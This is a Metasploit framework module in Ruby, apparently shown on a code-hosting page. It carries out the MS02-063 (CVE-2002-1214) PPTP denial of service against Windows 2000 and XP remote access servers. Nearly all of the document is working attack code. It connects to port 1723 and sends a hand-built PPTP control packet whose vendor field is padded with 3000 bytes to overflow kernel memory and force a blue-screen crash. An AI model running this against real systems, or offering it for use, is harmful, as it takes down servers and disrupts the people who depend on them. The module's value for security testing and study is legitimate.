Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',12'Description' => %q{13This module exploits a kernel based overflow when sending abnormal PPTP Control Data14packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers15(Remote Access Services). Kernel memory is overwritten resulting in a BSOD.16Code execution may be possible however this module is only a DoS.17},18'Author' => [ 'aushack' ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'BID', '5807' ],23[ 'CVE', '2002-1214' ],24[ 'OSVDB', '13422' ],25[ 'MSB', 'MS02-063' ],26],27'DisclosureDate' => '2002-09-26'))2829register_options(30[31Opt::RPORT(1723),32])33end3435def run36connect3738# Fields borrowed from Wireshark :)39sploit = "\x00\x9c" # length40sploit << "\x00\x01" # control message41sploit << "\x1a\x2b\x3c\x4d" # cookie42sploit << "\x00\x01" # start control connection req43sploit << "\x00\x00" # reserved44sploit << "\x01\x00" # protocol version45sploit << "\x00\x00" # reserved46sploit << "\x00\x03" # framing capabilities47sploit << "\x00\x00\x00\x02" # bearer capabilities48sploit << "\xff\xff" # max channels49sploit << "\x0a\x28" # firmware revision50sploit << "\x00\x01" # Hostname51sploit << "A" * 3000 # Vendor - trigger vuln5253print_status("Sending PPTP DoS Packet...")5455sock.put(sploit)5657print_status("Packet sent. Kernel should halt on a Stop Error (BSOD).")5859disconnect60end61end626364